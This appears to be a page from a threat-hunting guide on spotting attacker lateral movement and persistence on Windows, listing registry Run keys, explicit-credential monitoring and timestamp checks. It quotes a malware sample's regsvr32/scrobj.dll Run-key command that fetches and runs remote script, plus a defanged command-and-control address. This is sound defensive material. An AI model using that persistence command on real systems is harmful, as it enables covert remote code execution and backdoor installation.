Detecting lateral movement

Typically, the endpoint first compromised by an attacker isn't their final objective

Most people don't put their crown jewel database in the DMZ

In order to find their final objective, attackers need to undergo an exploratory phase, moving laterally throughout the network

The actions taken during this exploratory phase can be a helpful indicator

Processes

Once an adversary has gained access to a machine, they perform reconnaissance

Username, privilege level, running services, other reachable machines, etc

While they can use specialized malware for doing this, legitimate system processes work just as well:

Windows: net.exe, ipconfig.exe, whoami.exe, nbstat.exe, etc

The attacker will use these processes within a shorter than usual period of time

This deviation is a potential indicator of attack

Explicit credentials use (Windows)

Windows provides users with the ability to authenticate using explicit credentials

This is designed to allow batch operations

Explicit credentials are also used in pass-the-hash attacks

Use of explicit credentials should be monitored on Windows machines:

Authorized uses should be whitelisted
Unauthorized use should be investigated as a potential attack

Hunting for registry and system file changes

The Windows registry and system files have a lot of power on the system

Registry decides what is run at boot
System files can be run with elevated privileges

When hunting for threats in a Windows registry or system files, check for the following:

Registry persistence mechanisms
Changes to the registry
File creation/modify dates
Evidence of DLL hijacking

Registry persistence mechanisms

As mentioned previously, the registry is a common target for malware attempting to achieve persistence across reboots

Registry keys of interest include:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Registry changes

Fileless malware

Fileless malware has become more common lately to avoid antivirus detection

JS_POWMET uses an AutoStart registry procedure to download itself to the system:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run COM+ ="regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll"

This installs the PowerShell script backdoor trojan TROJ_PSINJECT and connects to the following website:

hxxps://bogerando[.]ru/favicon

Enabling registry auditing

Registry auditing is a feature offered by Windows to help detect malware's use of the registry as a persistence mechanism

Activating registry auditing is one of the security settings available under Active Directory or local group policy

Once auditing is enabled, you will need to use regedit.exe to open the registry and then manually choose every key that you would like to monitor

Checking file timestamps

File timestamps can be a valuable indicator of compromise when system files are modified

Most files in these directories should have the same or similar timestamps (when the system was last installed/updated)

Any exe or dll with a different extension may be worth investigating
Look for timestamps near the time of the suspected attack

Timestamps can be modified using time stomping, but this is more involved process

Not all attackers will take the time and effort to change all versions of a file's timestamp

Hunting for system file changes

DLLs and drivers are other potential targets of an advanced adversary

These files may be run by trusted processes, allowing malicious code to run in a trusted process, potentially with elevated permissions

Examination of DLLs and drivers (using driverquery) for anomalous values can be valuable for threat hunting

PreviousProcess hierarchy NextHunting for malicious files

Last updated 1 year ago

hashtagTypically, the endpoint first compromised by an attacker isn't their final objective

hashtagProcesses

hashtagOnce an adversary has gained access to a machine, they perform reconnaissance

hashtagExplicit credentials use (Windows)

hashtagWindows provides users with the ability to authenticate using explicit credentials

hashtagHunting for registry and system file changes

hashtagThe Windows registry and system files have a lot of power on the system

hashtagRegistry persistence mechanisms

hashtagRegistry changes

hashtagFileless malware

hashtagFileless malware has become more common lately to avoid antivirus detection

hashtagEnabling registry auditing

hashtagChecking file timestamps

hashtagFile timestamps can be a valuable indicator of compromise when system files are modified

hashtagHunting for system file changes